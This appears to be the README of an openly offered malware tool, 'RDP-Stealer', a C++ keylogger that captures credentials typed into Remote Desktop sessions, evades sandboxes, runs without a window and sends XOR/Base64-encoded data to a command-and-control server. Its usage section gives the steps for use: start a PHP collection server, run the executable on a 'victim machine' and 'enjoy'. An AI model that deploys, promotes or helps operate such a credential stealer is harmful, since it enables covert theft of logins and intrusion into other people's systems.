RDP-Stealer is C++ malware that targets Remote Desktop Protocol (RDP) processes. It acts as a keystroke logger, capturing credentials provided by users in RDP and sending back encrypted data to a C2 server.
Features
Basic Sandbox Evasion
Executes without a visible window (in the background).
Captures keystrokes in RDP processes using the context of mstsc.exe and CredentialUIBroker.exe.
Encrypts the captured data using XOR and BASE64.
Sends data to a C2 server.
Usage
Create a recvData folder in the directory.
Before running the RDPStealer.exe on the victim machine, first run the server.php.
php-S0.0.0.0:8000
Run the RDPStealer.exe on the victim machine and enjoy :).
.\RDPStealer.exe
Note β οΈ
It is better to use an HTTPS server instead of an HTTP server.